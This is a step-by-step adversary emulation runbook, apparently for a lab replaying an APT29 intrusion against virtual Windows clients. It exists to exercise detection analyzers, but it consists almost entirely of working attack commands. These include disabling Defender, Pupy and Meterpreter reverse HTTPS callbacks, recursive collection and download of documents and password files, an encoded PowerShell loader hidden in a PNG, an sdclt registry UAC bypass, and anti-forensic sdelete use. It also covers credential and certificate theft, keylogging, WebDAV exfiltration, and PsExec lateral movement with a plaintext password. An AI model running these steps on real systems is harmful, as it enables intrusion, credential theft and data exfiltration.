# APT29 - ATTACK SIMULATION



## Step 0 - Preparation

### 0A

**Attacker** (SSH)

Login to Attacker (**SSH = `ssh-atk`**), launch cmd & 4 different windows:

1. `pupysh` (PupyRAT for RC4 handler)
2. `sudo msfconsole` (first HTTPS handler) [Need root to be able to open tcp/443 port]
3. `sudo msfconsole` (second HHTPS handler)
4. another window for additional commands on the Attacker machine

**Manager** (SSH or RDP)

Start chosen analyzers on Manager (**start-scripts in APT29 directory**).  
Check **`README`** in `infrastructure/general` directory for additional informations.

**WinServer**

No action required.

**CLIENT1/CLIENT2** (SSH)

Windows Defender will detect some of the malicious payloads/process used in the scenario and therefore need to be disabled to be allowed to continue the scenario. Windows Defender can be managed on both machines with the following commands :

- `Get-MpComputerStatus` = PowerShell command to display Windows Defender status
- `DefenderControl /E` = CMD/Powershell command to enable Windows Defender (administrator privileges needed)
- `DefenderControl /D` = CMD/PowerShell command to disable Windows Defender (administrator privileges needed)

### 0B

Launch all the machine (`start-all`).  
**Note :** the main commands used to handle the virtual machines can be found in  **`README`** file in `infrasture/vboxcommands` directory.

## Step 1 - Initial Breach

### 1A 

1. Login to CLIENT1. (**SSH = `ssh-c1`**)

2. Double click `rcs.3aka3.doc` on Desktop (**SSH = launch it with PowerShell**) 

   This will send a reverse shell to the Pupy C2 server.

### 1B 

[pupy] > 

```powershell
shell
```

```
powershell
```



## Step 2 - Rapid Collection and Exfiltration

### 2A

[pupy (PowerShell)] > 

```powershell
$env:APPDATA;$files=ChildItem -Path $env:USERPROFILE\ -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\Draft.Zip -Force
```

[pupy (PowerShell)] > 

```powershell
exit
```

[pupy (CMD)] > 

```shell
exit
```

### 2B 

[pupy] >  

```
download "C:\Users\user1\AppData\Roaming\Draft.Zip" "/home/user/APT29/exfiltrated-data/Draft.zip"
```



## Step 3 - Deploy Stealth Toolkit

### 3A

[msf] > 

```
handler -H 0.0.0.0 -P 443 -p windows/x64/meterpreter/reverse_https
```

[pupy] > 

```
upload "/home/user/APT29/payloads/monkey.png" "C:\Users\user1\Downloads\monkey.png"
```

[pupy] > 

```
shell
```

[pupy CMD] > 

```shell
powershell
```

### 3B

[pupy (PowerShell)] >

```powershell
New-Item -Path HKCU:\Software\Classes -Name Folder -Force;
New-Item -Path HKCU:\Software\Classes\Folder -Name shell -Force;
New-Item -Path HKCU:\Software\Classes\Folder\shell -Name open -Force;
New-Item -Path HKCU:\Software\Classes\Folder\shell\open -Name command -Force;
Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "(Default)"
```

**When prompted for value, type: **

```powershell
powershell.exe -noni -noexit -ep bypass -window hidden -c "sal a New-Object;Add-Type -AssemblyName 'System.Drawing'; $g=a System.Drawing.Bitmap('C:\Users\user1\Downloads\monkey.png');$o=a Byte[] 3840;for($i=0; $i -le 6; $i++){foreach($x in(0..639)){$p=$g.GetPixel($x,$i);$o[$i*640+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G-band15))}};$g.Dispose();IEX([System.Text.Encoding]::ASCII.GetString($o[0..3615]))"
```

[pupy (PowerShell)] >

```powershell
Set-ItemProperty -Path "HKCU:\Software\Classes\Folder\shell\open\command" -Name "DelegateExecute" -Force
```

**When prompted for value, press: [Enter]**

[pupy (PowerShell)] > 

```powershell
exit
```

 [pupy (CMD)] > 

```shell
%windir%\system32\sdclt.exe
```

 [pupy CMD] > 

```shell
powershell
```

You should receive a high integrity Meterpreter callback.

### 3.C

[pupy (PowerShell)] > 

```powershell
Remove-Item -Path HKCU:\Software\Classes\Folder* -Recurse -Force
```

 [pupy (PowerShell)] > 

```powershell
exit
```

 [pupy (CMD)] > 

```shell
exit
```



## Step 4 - Defense Evasion and Discovery

### 4.A

From Metasploit:

[msf] > 

```
sessions
```

[msf] > 

```
sessions -i 1
```

[meterpreter*] >

```
upload /home/user/APT29/payloads/SysinternalsSuite.zip "C:\Users\user1\Downloads\SysinternalsSuite.zip"
```

[meterpreter*] > 

```powershell
execute -f powershell.exe -i -H
```

[meterpreter (PowerShell)*] >

```powershell
Expand-Archive -LiteralPath "$env:USERPROFILE\Downloads\SysinternalsSuite.zip" -DestinationPath "$env:USERPROFILE\Downloads\" -Force
```

[meterpreter (PowerShell)*] >

```powershell
if (-Not (Test-Path -Path "C:\Program Files\SysinternalsSuite")) { Move-Item -Path $env:USERPROFILE\Downloads\SysinternalsSuite -Destination "C:\Program Files\SysinternalsSuite" }
```

[meterpreter (PowerShell)*] > 

```powershell
cd "C:\Program Files\SysinternalsSuite\"
```

### 4.B

Terminate Pupy RAT process:

[meterpreter (PowerShell)*] > 

```powershell
Get-Process
```

[meterpreter (PowerShell)*] > 

```powershell
Stop-Process -Id <rcs.3aka3.doc PID> -Force
```

You may now close Pupy.

From Metasploit:

[meterpreter (PowerShell)*] > 

```powershell
Gci $env:userprofile\Desktop
```

[meterpreter (PowerShell)*] > 

```powershell
.\sdelete64.exe /accepteula "$env:USERPROFILE\Desktop\?cod.3aka3.scr"
```

[meterpreter (PowerShell)*] > 

```powershell
.\sdelete64.exe /accepteula "$env:APPDATA\Draft.Zip"
```

[meterpreter (PowerShell)*] > 

```powershell
.\sdelete64.exe /accepteula "$env:USERPROFILE\Downloads\SysinternalsSuite.zip"
```

Import custom script, readme.ps1:

[meterpreter (PowerShell)*] > 

```powershell
Move-Item .\readme.txt readme.ps1
```

[meterpreter (PowerShell)*] > 

```powershell
. .\readme.ps1
```

### 4.C 

[meterpreter (PowerShell)*] > 

```powershell
Invoke-Discovery
```



## Step 5 - Persistence

### 5.A

[meterpreter (PowerShell)*] > 

```powershell
Invoke-Persistence -PersistStep 1
```

### 5.B

[meterpreter (PowerShell)*] > 

```powershell
Invoke-Persistence -PersistStep 2
```



## Step 6 - Credential Access

### 6.A

Execute chrome-password collector:

[meterpreter (PowerShell)*] > 

```powershell
& "C:\Program Files\SysinternalsSuite\accesschk.exe"
```

*Commentaire PGR : La verson de l'outil accesschk.exe n'est pas cohérente avec le scénario. La commande ne donne que le "usage"*

### 6.B

Steal PFX certificate:

[meterpreter (PowerShell)*] > 

```powershell
Get-PrivateKeys
```

[meterpreter (PowerShell)*] > 

```powershell
exit
```

### 6.C

Dump password hashes:

[meterpreter*] > 

```
run post/windows/gather/credentials/credential_collector
```



## Step 7 - Collection and Exfiltration

### 7.A

[meterpreter*] > 

```
execute -f powershell.exe -i -H
```

[meterpreter (PowerShell)*] > 

```powershell
cd "C:\Program Files\SysinternalsSuite"
```

[meterpreter (PowerShell)*] > 

```powershell
Move-Item .\psversion.txt psversion.ps1
```

[meterpreter (PowerShell)*] > 

```powershell
. .\psversion.ps1
```

[meterpreter (PowerShell)*] >   **(if Windows GUI)**

```powershell
Invoke-ScreenCapture;Start-Sleep -Seconds 3;View-Job -JobName "Screenshot"
```

From the Windows victim, type text and copy to the clipboard.

[meterpreter (PowerShell)*] > 

```powershell
Get-Clipboard
```

[meterpreter (PowerShell)*] > 

```powershell
Keystroke-Check
```

**If an error occured, re-run :** 

[meterpreter (PowerShell)*] > 

```powershell
. .\psversion.ps1
```

[meterpreter (PowerShell)*] > 

```powershell
Get-Keystrokes;Start-Sleep -Seconds 15;View-Job -JobName "Keystrokes"
```

From victim system, enter keystrokes.

View keylog output from Metasploit:

[meterpreter (PowerShell)*] > 

```powershell
View-Job -JobName "Keystrokes"
```

[meterpreter (PowerShell)*] > 

```powershell
Remove-Job -Name "Keystrokes" -Force
```

[meterpreter (PowerShell)*] > 

```powershell
Remove-Job -Name "Screenshot" -Force
```

### 7.B 

[meterpreter (PowerShell)*] > 

```powershell
Invoke-Exfil
```

Wait for `[*] Installing 7Zip4Powershell module` and press `[Enter]`

 [user@attacker]# 

```shell
mv /var/www/webdav/Exfil-Data.7z ~/APT29/exfiltrated-data
```



## Step 8 - Lateral Movement

### 8.A

Copy payload to webdav share:

[user@attacker]#  

```bash
sudo cp ~/APT29/payloads/Seaduke/python.exe /var/www/webdav/
```

 [user@attacker]# 

```bash
sudo chown -R www-data:www-data /var/www/webdav/python.exe
```

Switch back to Meterpreter shell:

[meterpreter (PowerShell)*] > 

```powershell
Ad-Search Computer Name *
```

[meterpreter (PowerShell)*] >

```powershell
Invoke-Command -ComputerName CLIENT2 -ScriptBlock { Get-Process -IncludeUserName | Select-Object UserName,SessionId | Where-Object { $_.UserName -like "*\$env:USERNAME" } | Sort-Object SessionId -Unique } | Select-Object UserName,SessionId
```

Note the session ID for step 8C.

### 8.B

In the third instance of Metasploit, spawn a Metasploit handler:

[msf] > 

```
handler -H 0.0.0.0 -P 8443 -p python/meterpreter/reverse_https
```

Return to current Meterpreter session:

[meterpreter (PowerShell)*] > 

```powershell
Invoke-SeaDukeStage -ComputerName CLIENT2
```

### 8.C

Execute SEADUKE Remotely via PSEXEC (**<session ID from 8A>  = 0**)

[meterpreter (PowerShell)*] >

```powershell
.\PsExec64.exe -accepteula \\Client2 -u "SECEF\user1" -p "Admin78" -i <session-ID-8C-STEP> "C:\Windows\Temp\python.exe" 
```
*Comment PGR : Did not understand exactly where the user/pass came from"*

You should receive a callback in your other Metasploit terminal.

## Step 9 - Collection

### 9.A

From the second Metasploit terminal:

[msf] > 

```
sessions
```

 [msf] > 

```
sessions -i 1
```

[meterpreter*] >

```
upload "/home/user/APT29/payloads/Seaduke/rar.exe" "C:\Windows\Temp\Rar.exe"
```

[meterpreter*] >

```
upload "/home/user/APT29/payloads/Seaduke/sdelete64.exe" "C:\Windows\Temp\sdelete64.exe"
```

### 9.B

[meterpreter*] > 

```
execute -f powershell.exe -i -H
```

[meterpreter (PowerShell)*] >

```powershell
$env:APPDATA;$files=ChildItem -Path "C:\Users\user2\" -Include *.doc,*.xps,*.xls,*.ppt,*.pps,*.wps,*.wpd,*.ods,*.odt,*.lwp,*.jtd,*.pdf,*.zip,*.rar,*.docx,*.url,*.xlsx,*.pptx,*.ppsx,*.pst,*.ost,*psw*,*pass*,*login*,*admin*,*sifr*,*sifer*,*vpn,*.jpg,*.txt,*.lnk -Recurse -ErrorAction SilentlyContinue | Select -ExpandProperty FullName; Compress-Archive -LiteralPath $files -CompressionLevel Optimal -DestinationPath $env:APPDATA\working.zip -Force
```
*Comment PGR : in original scenario the attacker get data owned by connected user, not one other Here getting user2 data from user1 does not work!"*

[meterpreter (PowerShell)*] > 

```powershell
cd C:\Windows\Temp
```

[meterpreter (PowerShell)*] > 

```powershell
.\Rar.exe a -hpfGzq5yKw "$env:USERPROFILE\Desktop\working.zip" "$env:APPDATA\working.zip"
```

[meterpreter (PowerShell)*] > 

```powershell
exit
```

[meterpreter*] > 

```
download "C:\Users\user1\Desktop\working.zip" "/home/user/APT29/exfiltrated-data"
```

### 9.C

[meterpreter*] >

```
shell
```

[meterpreter (Shell)*] > 

```shell
cd "C:\Windows\Temp"
```

[meterpreter (Shell)*] > 

```shell
.\sdelete64.exe /accepteula "C:\Windows\Temp\Rar.exe"
```

[meterpreter (Shell)*] > 

```shell
.\sdelete64.exe /accepteula "C:\Users\user1\AppData\Roaming\working.zip"
```

[meterpreter (Shell)*] > 

```shell
.\sdelete64.exe /accepteula "C:\Users\user1\Desktop\working.zip"
```

[meterpreter (Shell)*] > 

```shell
del "C:\Windows\Temp\sdelete64.exe"
```

Terminate Session
[meterpreter (Shell)*] > 

```shell
exit
```

[meterpreter*] > 

```
exit
```

msf> 

```
exit
```



## Step 10 - Persistence Execution

### 10.A

Reboot Windows victim 1; wait for system to boot up

[meterpreter (PowerShell)*] > 

```powershell
Restart-Computer Client1 -Force
```

You should receive a callback with SYSTEM permissions from javamtsup service.

### 10.B

Trigger the Startup Folder persistence by logging in to CLIENT1



## Post-scenario

Stop all the machines. (`stop-all`)  
Reset all the machines to their non-compromised state to restart the scenario. (`reset-scenario`)
